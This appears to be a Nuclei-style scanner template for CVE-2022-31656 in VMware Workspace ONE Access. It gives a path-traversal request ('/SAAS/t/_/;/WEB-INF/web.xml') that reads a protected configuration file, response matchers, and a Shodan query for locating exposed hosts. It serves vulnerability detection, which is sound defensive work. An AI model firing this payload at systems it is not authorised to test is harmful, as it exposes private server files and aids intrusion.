47 lines
1.4 KiB
YAML
47 lines
1.4 KiB
YAML
id: CVE-2022-31656
|
|
|
|
info:
|
|
name: VMware - Local File Inclusion
|
|
author: DhiyaneshDk
|
|
severity: critical
|
|
description: |
|
|
VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
|
|
reference:
|
|
- https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
|
|
- https://www.vmware.com/security/advisories/VMSA-2022-0021.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31656
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-31656
|
|
cwe-id: CWE-287
|
|
metadata:
|
|
shodan-query: http.favicon.hash:-1250474341
|
|
verified: "true"
|
|
tags: cve,cve2022,vmware,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<web-app"
|
|
- "<servlet-name>"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/xml"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2023/01/15
|